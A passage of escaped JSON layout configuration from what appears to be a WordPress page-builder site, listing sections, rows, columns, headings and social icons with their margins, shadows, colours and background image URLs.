":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"30\",\"y\":\"10\"}]},\"zIndex\":\"1\",\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c22\"]},{\"id\":363,\"type\":\"hop-column\",\"style\":{\"textAlign\":\"left\",\"background\":{\"color\":\"${theme.colors.4}\"},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c23\"]},{\"id\":364,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"126-c24\"]},{\"id\":366,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c25\"]},{\"id\":367,\"type\":\"hop-content\",\"nodeId\":\"453-c1\",\"nodes\":[\"453-c1\"],\"style\":[],\"v\":\"1.1\"},{\"id\":368,\"type\":\"hop-content\",\"nodeId\":\"449-c1\",\"nodes\":[\"449-c1\"],\"v\":\"1.1\"},{\"id\":369,\"type\":\"hop-section\",\"nodeId\":\"449-c2\",\"nodes\":[\"449-c2\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]},\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":370,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"449-c3\",\"nodes\":[\"449-c3\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":371,\"type\":\"hop-column\",\"nodeId\":\"449-c4\",\"nodes\":[\"449-c4\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":372,\"type\":\"hop-text\",\"nodeId\":\"449-c5\",\"nodes\":[\"449-c5\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[],\"desktop\":[]}}},{\"id\":377,\"type\":\"hop-section\",\"nodeId\":\"449-c6\",\"nodes\":[\"449-c2\"],\"v\":\"1.1\",\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":378,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"449-c7\",\"nodes\":[\"449-c3\"],\"v\":\"1.1\"},{\"id\":379,\"type\":\"hop-column\",\"nodeId\":\"449-c8\",\"nodes\":[\"449-c4\"],\"v\":\"1.1\"},{\"id\":380,\"type\":\"hop-text\",\"nodeId\":\"449-c9\",\"nodes\":[\"449-c5\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\"}},{\"id\":381,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c26\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}},\"props\":{\"width\":\"full-width\"}},{\"id\":382,\"props\":{\"layout\":{\"equalWidth\":false,\"verticalGap\":0,\"horizontalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c27\"]},{\"id\":383,\"type\":\"hop-column\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"textAlign\":\"left\",\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"margin\":{\"top\":{\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c28\"]},{\"id\":384,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"126-c29\"]},{\"id\":386,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c30\"]},{\"id\":387,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Opherus.png\"},\"position\":\"center center\",\"size\":\"cover\"}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"y\":\"10\",\"blur\":\"30\"}]},\"media\":{\"mobile\":{\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"-5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c31\"]},{\"id\":388,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c32\"],\"props\":{\"width\":\"full-width\"}},{\"id\":389,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c33\"]},{\"id\":390,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/Picture1.jpg\"},\"position\":{\"x\":77.72398745397518,\"y\":53.316665364481594}}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"30\",\"y\":\"10\"}]},\"zIndex\":\"1\",\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c34\"]},{\"id\":391,\"type\":\"hop-column\",\"style\":{\"textAlign\":\"left\",\"background\":{\"color\":\"${theme.colors.4}\"},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c35\"]},{\"id\":392,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"126-c36\"]},{\"id\":394,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c37\"]},{\"id\":395,\"type\":\"hop-content\",\"nodeId\":\"185-c1\",\"nodes\":[\"185-c1\"],\"v\":\"1.1\"},{\"id\":396,\"type\":\"hop-section\",\"style\":{\"customHeight\":{\"type\":\"fit-to-content\"},\"separatorTop\":{\"enabled\":false,\"type\":\"opacity-tilt\",\"negative\":false,\"height\":{\"value\":300}},\"background\":{\"overlay\":{\"enabled\":false,\"type\":\"shapeOnly\",\"shape\":{\"value\":\"two-circles\",\"isTile\":false}},\"color\":\"#F5FAFD\"},\"separatorBottom\":{\"enabled\":false,\"type\":\"opacity-tilt\",\"negative\":false,\"height\":{\"value\":300}}},\"props\":{\"width\":\"boxed\"},\"v\":\"1.1\",\"nodes\":[\"185-c2\"]},{\"id\":397,\"props\":{\"layout\":{\"equalWidth\":false,\"verticalGap\":0,\"horizontalGap\":0},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"185-c3\"]},{\"id\":398,\"type\":\"hop-column\",\"style\":{\"textAlign\":\"left\",\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"%\"},\"right\":{\"value\":\"12\",\"unit\":\"%\"},\"bottom\":{\"value\":\"5\",\"unit\":\"%\"},\"left\":{\"value\":\"17\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"%\"},\"right\":{\"value\":\"5\",\"unit\":\"%\"},\"bottom\":{\"value\":\"5\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}}},\"mobile\":{\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}},\"textAlign\":\"center\"}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}}},\"v\":\"1.1\",\"nodes\":[\"185-c4\"]},{\"id\":399,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"style\":{\"typography\":{\"transform\":\"uppercase\"}},\"v\":\"1.1\",\"nodes\":[\"185-c5\"]},{\"id\":400,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"2\"},\"v\":\"1.1\",\"nodes\":[\"185-c5\"]},{\"id\":401,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"185-c6\"]},{\"id\":406,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp\"},\"position\":\"center center\"}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"y\":\"10\",\"spread\":\"0\",\"blur\":\"20\",\"color\":\"rgba(0, 0, 0, 0.2)\"}]},\"media\":{\"mobile\":{\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"400\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"185-c7\"]},{\"id\":407,\"type\":\"hop-content\",\"nodeId\":\"182-c1\",\"nodes\":[\"182-c1\"],\"v\":\"1.1\"},{\"id\":408,\"type\":\"hop-section\",\"nodeId\":\"182-c2\",\"nodes\":[\"182-c2\"],\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\"},{\"id\":409,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"182-c3\",\"nodes\":[\"182-c3\"],\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\"},{\"id\":410,\"type\":\"hop-column\",\"nodeId\":\"182-c4\",\"nodes\":[\"182-c4\"],\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\"},{\"id\":412,\"type\":\"hop-text\",\"nodeId\":\"182-c6\",\"nodes\":[\"182-c6\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[],\"desktop\":[]},\"textAlign\":\"center\"}},{\"id\":413,\"type\":\"hop-content\",\"nodeId\":\"608-c1\",\"nodes\":[\"608-c1\"],\"v\":\"1.1\"},{\"id\":417,\"type\":\"hop-section\",\"nodeId\":\"608-c5\",\"nodes\":[\"608-c2\"],\"v\":\"1.1\",\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":418,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"608-c6\",\"nodes\":[\"608-c3\"],\"v\":\"1.1\"},{\"id\":419,\"type\":\"hop-column\",\"nodeId\":\"608-c7\",\"nodes\":[\"608-c4\"],\"v\":\"1.1\"},{\"id\":420,\"type\":\"hop-text\",\"nodeId\":\"608-c8\",\"nodes\":[\"608-c5\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\",\"typography\":{\"holders\":{\"p\":{\"style\":\"normal\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}}}}}},{\"id\":421,\"type\":\"hop-section\",\"nodeId\":\"182-c6\",\"nodes\":[\"182-c6\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]},\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":422,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"182-c7\",\"nodes\":[\"182-c7\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":423,\"type\":\"hop-column\",\"nodeId\":\"182-c8\",\"nodes\":[\"182-c8\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":440,\"type\":\"hop-section\",\"props\":{\"showHeader\":false},\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"}},\"v\":\"1.1\",\"nodes\":[\"182-c2\"]},{\"id\":441,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}},\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c3\"]},{\"id\":442,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.1)\",\"blur\":\"3\",\"y\":\"1\",\"spread\":\"1\"}]},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"background\":{\"color\":\"${theme.colors.4}\"}},\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c4\",\"182-c11\",\"182-c18\",\"182-c25\"]},{\"id\":443,\"type\":\"hop-image\",\"v\":\"1.1\",\"nodes\":[\"182-c5\",\"182-c12\",\"182-c19\",\"182-c26\"],\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}}}},\"frameImage\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}}}}}}},{\"id\":444,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c6\",\"182-c13\",\"182-c20\",\"182-c27\"]},{\"id\":445,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"15\"}}},\"v\":\"1.1\",\"nodes\":[\"182-c7\",\"182-c14\",\"182-c21\",\"182-c28\"]},{\"id\":446,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c8\",\"182-c15\",\"182-c22\",\"182-c29\"]},{\"id\":447,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"182-c9\",\"182-c16\",\"182-c23\",\"182-c30\"]},{\"id\":448,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"props\":{\"colorType\":\"custom\"},\"nodes\":[\"182-c10\"]},{\"id\":449,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c17\"]},{\"id\":450,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c24\"]},{\"id\":451,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c31\"]},{\"id\":452,\"props\":{\"layout\":{\"equalWidth\":false},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c73\"]},{\"id\":453,\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"props\":{\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"v\":\"1.1\",\"nodes\":[\"182-c74\"]},{\"id\":454,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c75\"]},{\"id\":510,\"type\":\"hop-section\",\"props\":{\"showHeader\":true},\"style\":{\"background\":{\"color\":\"\"}},\"v\":\"1.1\",\"nodes\":[\"182-c2\"]},{\"id\":511,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}},\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c3\"]},{\"id\":512,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.1)\",\"blur\":\"3\",\"y\":\"1\",\"spread\":\"1\"}]},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"background\":{\"color\":\"${theme.colors.4}\"}},\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c4\",\"182-c11\",\"182-c18\",\"182-c25\",\"182-c32\",\"182-c39\",\"182-c46\",\"182-c53\",\"182-c60\"]},{\"id\":513,\"type\":\"hop-image\",\"v\":\"1.1\",\"nodes\":[\"182-c5\",\"182-c12\",\"182-c19\",\"182-c26\",\"182-c33\",\"182-c40\",\"182-c47\",\"182-c54\",\"182-c61\"]},{\"id\":514,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c6\",